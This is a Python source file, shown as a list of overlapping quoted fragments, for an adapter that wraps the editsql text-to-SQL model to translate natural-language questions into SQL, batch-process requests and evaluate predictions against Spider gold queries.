accuracy = num_correct *", "''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if", "atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model,", "nl_questions: the natural language questions db_id: the database that acts as context prev_predictions:", "used for loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer,", "interaction Args: nl_question: the natural language question db_id: the database that acts as", "len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if", "glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token)", "= 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings:", "= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite", "= prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return", "relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\")", "editsql \"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as", "translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison", "params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model", "# normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if", "dev_pred_norm = ''.join(\"0\" if 
c.isdigit() else c.lower() for c in dev_prediction) translation_norm =", "if is_error: num_errors += 1 if is_error or show_all: comparison = dict() comparison[\"identifier\"]", "input file and save the translations to a file in the output directory", "with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a", "model data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE,", "or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case", "from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the", "from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from", "natural language questions db_id: the database that acts as context prev_predictions: the previous", "of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file)", "to _all_ examples from the file amount = len(references) # determine the instances", "glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV',", "output directory Args: input_file: path of file with list of dicts with values", "bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\")", "example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\"", "of dicts with values for nl_question and db_id from the input file and", "+ \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4) #", 
"example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int =", "utterance in an interaction Args: nl_question: the natural language question db_id: the database", "item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all:", "= vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id", "do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH,", "else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file =", "\"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and", "json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def", "db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for the next utterance in an", "dev_pred_norm if is_error: num_errors += 1 if is_error or show_all: comparison = dict()", "the database id Args: nl_questions: the natural language questions db_id: the database that", "sql for the next utterance in an interaction Args: nl_question: the natural language", "the natural language question db_id: the database that acts as context Returns: the", "dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"]", "output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove ----------- glove_embeddings =", "model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device)", "the database that acts as context prev_predictions: the previous 
predictions Returns: an InteractionItem", "\" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates", "from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util", "id Args: nl_questions: the natural language questions db_id: the database that acts as", "import Path import numpy as np import json import torch from editsql.data_util import", "amount = len(references) # determine the instances to test on if randomness: sample_indices", "parse_args_sparc from adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE", "with the gold queries from spider Args: amount: the amount of samples to", "[(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to", "= [] num_errors = 0 start = time.time() for i in sample_indices: db_id", "arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params", "for nl_question and db_id output_dir: path of dir where the translations are saved", "= postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold =", "the gold queries from spider instead of the prediction results of standalone editsql", "to a file in the output directory Args: input_file: path of file with", "language question db_id: the database that acts as context Returns: the sql prediction", "the instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices", "tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants", "return model_bert, tokenizer, 
bert_config # overwrite the original function with the modified version", "schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema)", "for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \"", "as infile: references = json.load(infile) if not amount: # let amount default to", "= in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql", "a modified version with absolute path instead of relative path in the first", "= parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model =", "samples, not only those with errors use_gold_query: comparison with the gold queries from", "prev_predictions: the previous predictions or an empty list Returns: the sql prediction \"\"\"", "the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj)", "= tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint,", "vocab.inorder_tokens glove_oov = 0 para_oov = 0 for token in vocabulary_tokens: token_id =", "output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings,", "import numpy as np import json import torch from editsql.data_util import atis_batch from", "Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction", "in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction)", "c.isdigit() 
else c.lower() for c in translation) if use_gold_query: is_error = translation_norm !=", "example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"]", "edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\")", "prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\"", "model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that", "else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function with", "for c in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error", "standalone editsql \"\"\" # load the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE)", "'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS'", "eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons", "dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold", "# ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the", "processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts", "False else: do_lower_case = True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, 
f'bert_config_{bert_type}.json') vocab_file", "editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import", "samples to use randomness: randomly choose samples show_all: write all samples, not only", "of editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if", "with the gold queries from spider instead of the prediction results of standalone", "the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id,", "= SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None)", "state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the", "of standalone editsql \"\"\" # load the prediction results of standalone editsql with", "schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction,", "OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings", "raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\"", "if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case", "are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f)", "import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from", "i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] 
example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"]", "file with list of dicts with values for nl_question and db_id output_dir: path", "end = time.time() duration = end - start time_per_item = duration / amount", "normalize and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit()", "fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q", "interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self,", "model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import", "the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42", "the gold queries from spider Args: amount: the amount of samples to use", "# define a modified version with absolute path instead of relative path in", "db_id: the database that acts as context prev_predictions: the previous predictions Returns: an", "editsql to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model", "= glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov", "parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config", "of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self,", "------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, 
use_gold_query=False): \"\"\" Evaluate the translation", "time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content, outfile, indent=4)", "\"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring", "overwrite the original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql", "editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig,", "editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization", "if c.isdigit() else c.lower() for c in translation) if use_gold_query: is_error = translation_norm", "amount: # let amount default to _all_ examples from the file amount =", "eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") # ------------ Batch processing ----------------- @classmethod", "# ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the", "tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu'))", "Args: nl_question: the natural language question db_id: the database that acts as context", "= translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or show_all:", "enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def 
write_json_log_results(content, directory): path = Path(directory)", "= self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question,", "samples show_all: write all samples, not only those with errors use_gold_query: comparison with", "gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering", "in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1]", "prediction \"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction", "db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens =", "randomness: randomly choose samples show_all: write all samples, not only those with errors", "/ amount num_correct = amount - num_errors accuracy = num_correct * 100 /", "\"query to be predicted\" # transform the raw interaction to an InteractionItem obj,", "/ filename), 'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings", "of EditsqlAdapter. 
By default the prediction results of standalone editsql act as the", "as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function that", "vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov =", "db_id: the database that acts as context Returns: the sql prediction \"\"\" #", "import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel", "= random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0", "language question db_id: the database that acts as context prev_nl_questions: the previous questions", "= self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize", "if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not", "\"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields", "load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove -----------", "questions into sql \"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params =", "\"\"\" Evaluate the translation output of EditsqlAdapter. 
By default the prediction results of", "os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file',", "class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary questions into", "nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction)", "[] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\"", "on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons =", "parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util from api.paths import", "dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end - start", "with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: # let amount", "def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter.", "= json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir)", "queries from spider Args: amount: the amount of samples to use randomness: randomly", "sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q,", "randomly choose samples show_all: write all samples, not only those with errors use_gold_query:", "c in translation) if use_gold_query: is_error = translation_norm != gold_norm else: is_error =", 
"read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in raw", "standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount: #", "get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS':", "postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \" \".join(references[i][\"gold_query\"]) gold = postprocess_one(gold,", "token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov,", "= [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query", "__init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args()", "predictions Returns: an InteractionItem that contains the natural language question and the database", "return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\"", "else: sample_indices = range(amount) comparisons = [] num_errors = 0 start = time.time()", "num_errors = 0 start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"]", "model == \"sparc\": params = parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the", "an empty list prev_predictions: the previous predictions or an empty list Returns: the", "test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons", 
"enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])] example[\"interaction\"].append({\"utterance\": nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"]", "that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size", "absolute path instead of relative path in the first line def get_bert(params): BERT_PT_PATH", "Uses the functionality of editsql to translate arbitrary questions into sql \"\"\" def", "BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api", "def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural", "prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction,", "load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation", "that contains the natural language question and the database id Args: nl_questions: the", "load_model(self, params, data): \"\"\" Loads the editsql translation model Args: params: the parsed", "and the database id Args: nl_questions: the natural language questions db_id: the database", "= BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if no_pretraining:", "= db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(),", "gold queries from spider Args: amount: the amount of samples to use randomness:", "pred_str = \" 
\".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id]", "import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import", "the translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests", "prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the", "self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction", "context Returns: the sql prediction \"\"\" # preprocess nl_questions = [nl_question] interaction =", "as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from", "to use randomness: randomly choose samples show_all: write all samples, not only those", "Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer", "model_bert, tokenizer, bert_config # overwrite the original function with the modified version utils_bert.get_bert", "editsql.data_util.atis_data import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from", "api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate", "an interaction Args: nl_question: the natural language question db_id: the database that acts", "= [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id)", "--------------------------------------- 
input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens =", "'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL'", "natural language question db_id: the database that acts as context Returns: the sql", "token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov +=", "self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the", "= accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR", "= amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"]", "output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question and db_id", "raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return", "of file with list of dicts with values for nl_question and db_id output_dir:", "for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] =", "translations are saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests =", "time.time() duration = end - start time_per_item = duration / amount num_correct =", "= create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = 
create_word_embeddings(output_vocabulary_schema)", "= [] # fill the general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] =", "------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list", "input_embedding_size # overwrite the original embeddings loading function with the modified version model.load_word_embeddings", "setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql", "bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config) if", "import ATISDataset from editsql.data_util.interaction import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model", "# create the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data)", "= len(references) # determine the instances to test on if randomness: sample_indices =", "example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general", "= 300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # ---------------------------------------", "pathlib import Path import numpy as np import json import torch from editsql.data_util", "the dataset and model data = ATISDataset(params) self.model = self.load_model(params, data) _, _,", "EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request in enumerate(requests):", "= dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] = \"dummy", "glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings", "as np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data 
import", "= load_word_embeddings_for_editsql # define a modified version with absolute path instead of relative", "c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for", "\"\"\" Loads the editsql translation model Args: params: the parsed arguments data: the", "translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error: num_errors +=", "use_gold_query: comparison with the gold queries from spider instead of the prediction results", "= 0 para_oov = 0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if", "from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions):", "nl_question and db_id from the input file and save the translations to a", "model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary, data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else", "model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the", "random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors = 0 start", "for nl_question and db_id from the input file and save the translations to", "the translation output of EditsqlAdapter. 
By default the prediction results of standalone editsql", "= {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction", "the original embeddings loading function with the modified version model.load_word_embeddings = load_word_embeddings_for_editsql #", "editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert", "line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL':", "EditsqlAdapter. By default the prediction results of standalone editsql act as the reference.", "import random import time from pathlib import Path import numpy as np import", "prev_predictions=[]) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions):", "modified embeddings loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary,", "previous questions or an empty list prev_predictions: the previous predictions or an empty", "= \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw)", "/ amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] =", "dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] =", "load_word_embeddings_for_editsql # define a modified version with absolute path instead of relative path", "\".join(references[i][\"gold_query\"]) gold = postprocess_one(gold, schema) # normalize and prevent numbering 
from distorting the", "= \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed", "else: params = parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params)", "per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"] = accuracy if", "vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove", "version with absolute path instead of relative path in the first line def", "f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file)", "= prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \"", "question db_id: the database that acts as context Returns: the sql prediction \"\"\"", "the previous predictions or an empty list Returns: the sql prediction \"\"\" #", "from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import", "= self.model.predict_with_predicted_queries(interaction, 1000) 